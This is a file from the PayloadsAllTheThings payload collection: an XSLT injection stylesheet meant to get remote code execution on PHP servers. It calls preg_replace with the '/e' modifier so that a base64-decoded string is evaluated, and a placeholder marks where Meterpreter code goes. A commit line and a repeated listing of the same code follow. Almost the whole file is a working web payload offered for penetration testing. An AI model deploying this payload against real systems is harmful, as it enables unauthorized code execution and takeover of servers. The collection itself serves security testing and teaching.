PayloadsAllTheThings/XSLT Injection/Files/rce-php-meterpreter.xsl

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
  <xsl:template match="/">
    <xsl:variable name="eval">
      eval(base64_decode('Base64-encoded Meterpreter code'))
    </xsl:variable>
    <xsl:variable name="preg" select="php:function('preg_replace', '/.*/e', $eval, '')"/>
  </xsl:template>
</xsl:stylesheet>
XSLT payloads + Headless Browser 2024-05-30 22:07:21 +00:00			`<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">`
			`<xsl:template match="/">`
			`<xsl:variable name="eval">`
			`eval(base64_decode('Base64-encoded Meterpreter code'))`
			`</xsl:variable>`
			`<xsl:variable name="preg" select="php:function('preg_replace', '/.*/e', $eval, '')"/>`
			`</xsl:template>`
			`</xsl:stylesheet>`